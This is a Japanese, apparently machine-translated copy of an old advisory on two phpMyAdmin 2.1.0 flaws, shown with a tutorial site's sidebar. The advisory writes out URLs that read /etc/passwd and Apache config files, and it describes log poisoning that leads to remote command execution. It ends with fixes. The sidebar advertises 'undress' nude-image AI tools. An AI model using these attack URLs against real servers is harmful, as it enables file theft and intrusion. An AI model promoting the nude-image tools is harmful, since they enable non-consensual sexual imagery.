phpMyAdmin2.1.0_PHP チュートリアルには 2 つの脆弱性があります
phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) は、WEB ベースのインターフェイスを備えた、MySQL データベースを管理するための PHP ツールです。しかし、それには抜け穴があることが判明した。必要に応じて、新しくリリースされた安定バージョン:
phpMyAdmin 2.2.0 をインストールします。
1. ディレクトリ トラバーサルの脆弱性
攻撃者は次の URL を提供します:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)
http://www. .com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
システム ファイルに不正にアクセスできる
問題のあるコードは次のとおりです: sql.php と tbl_replace 内の 'include($goto);'。
2. 攻撃者によるコード実行の脆弱性
攻撃者は、グローバルに書き込み可能なログ ファイルを使用することにより、影響を受けるサーバー上で任意のコードを実行することができます。
まず、Apache 設定ファイルを取得して、ログ ファイルが保存されている場所を確認します:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/ etc/apache/ conf/access.conf&btnDrop=No
ログが次の場所に配置されていることがわかります:
/var/log/httpd/error_log
/var/log/httpd/access_log
次に、ポート 80 に Telnet します
# telnet www.example.com 80
xxx.xxx.xxx.xxx を試行しています...
www.example.com に接続しています。
GET
^]
telnet> 接続が終了しました。 #
GET リクエストの後、攻撃者は任意の PHP コードをアップロードできます
これで、Apache ユーザーとしてコマンドをリモートで実行できるようになります:
http://www.example.com/phpMyAdmin/sql.php?goto=/var/log /httpd/
access_log&btnDrop= No?meters=ls%20-l%20/
影響を受けるシステム:
phpMyAdmin 2.1.0
解決策:
提案:
1. phpMyAdmin 2.2.0 を使用します
http://prdownloads.sourceforge。 net/phpmyadmin/ phpMyAdmin-2.2.0-php.tar.gz
2. ユーザーがパッチをダウンロードしてインストールします:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff
抜粋: 52w .net
http://www.bkjia.com/PHPjc/629808.html
www.bkjia.com
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
AI Hentai Generator
AIヘンタイを無料で生成します。
人気の記事
ホットツール
メモ帳++7.3.1
使いやすく無料のコードエディター
SublimeText3 中国語版
中国語版、とても使いやすい
ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境
ドリームウィーバー CS6
ビジュアル Web 開発ツール
SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)
ホットトピック
7461
15
1376
52
77
11
17
17
phpmyadminで主キーを設定する方法
Apr 07, 2024 pm 02:54 PM
テーブルの主キーは、テーブル内の各レコードを一意に識別する 1 つ以上の列です。主キーを設定する手順は次のとおりです。 phpMyAdmin にログインします。データベースとテーブルを選択します。主キーとして使用する列にチェックを入れます。 「変更を保存」をクリックします。主キーは、データの整合性、検索速度、関係モデリングの利点を提供します。
phpmyadminで外部キーを追加する方法
Apr 07, 2024 pm 02:36 PM
phpMyAdmin に外部キーを追加するには、次の手順に従います。 外部キーを含む親テーブルを選択します。親テーブルの構造を編集し、「列」に新しい列を追加します。外部キー制約を有効にし、参照テーブルとキーを選択します。更新・削除の動作を設定します。変更内容を保存。
WordPress データベースはどこにありますか?
Apr 15, 2024 pm 10:39 PM
WordPress データベースは、すべての Web サイト データを保存する MySQL データベースに格納されており、ホスティング プロバイダーのダッシュボード、FTP、または phpMyAdmin を通じてアクセスできます。データベース名は Web サイトの URL またはユーザー名に関連付けられており、アクセスするには、名前、ユーザー名、パスワード、ホスト名などのデータベース資格情報を使用する必要があります。これらの資格情報は通常「wp-config.php」ファイルに保存されます。
phpmyadminでデータテーブルを削除する方法
Apr 07, 2024 pm 03:00 PM
phpMyAdmin でデータ テーブルを削除する手順: データベースとデータ テーブルを選択し、[アクション] タブをクリックし、[削除] オプションを選択し、削除操作を確認して実行します。
phpmyadmin の脆弱性はどのような脆弱性ですか?
Apr 07, 2024 pm 01:36 PM
phpMyAdmin は、1. SQL インジェクションの脆弱性、2. クロスサイト スクリプティング (XSS) の脆弱性、3. リモート コード実行 (RCE) の脆弱性、4. ローカル ファイル インクルード (LFI) の脆弱性、5. 情報漏えいなどの複数の脆弱性の影響を受けます。脆弱性; 6. 権限昇格の脆弱性。
phpmyadminを使用してExcelをエクスポートする方法
Apr 07, 2024 pm 02:24 PM
phpMyAdmin 経由でデータを Excel 形式にエクスポートする: phpMyAdmin にログインした後、エクスポートするデータベースとテーブルを選択します。 [エクスポート] オプションをクリックし、[形式] ドロップダウン メニューで [Excel] を選択します。独自のエクスポート列、クエリ オプション、およびその他のエクスポート オプションを選択します。 「ダンプ」ボタンをクリックしてエクスポートを開始し、エクスポートされた Excel ファイルをダウンロードします。
navicat が接続できない場合はどうすればよいですか?
Apr 23, 2024 am 10:00 AM
Navicat が接続できない場合は、次の解決策を順番に試してください。 データベース名、ホスト名、ポート番号、ユーザー名、パスワードなどの接続情報が正しいかどうかを確認します。データベースが稼働していることを確認してください。ファイアウォール ルールをチェックして、Navicat および関連サービスがブロックされていないことを確認します。 ping コマンドを使用してネットワーク接続をテストしてみてください。 Navicat クライアント ソフトウェアを最新バージョンに更新します。サーバー ログで、失敗した接続に関連するエラー メッセージを確認してください。 Navicat 固有の問題のトラブルシューティングを行うには、他のデータベース ツールを使用して接続を試してください。
phpmyadmin データベースとはどのようなデータベースですか?
Apr 07, 2024 pm 01:24 PM
phpMyAdmin はデータベースではありませんが、MySQL および MariaDB データベースを管理するための無料のオープンソース Web ツールです。これにより、ユーザーは次のことが可能になります。 データベースとテーブルの管理 SQL クエリとステートメントの実行 ユーザーと権限の管理 データベース パフォーマンスの監視
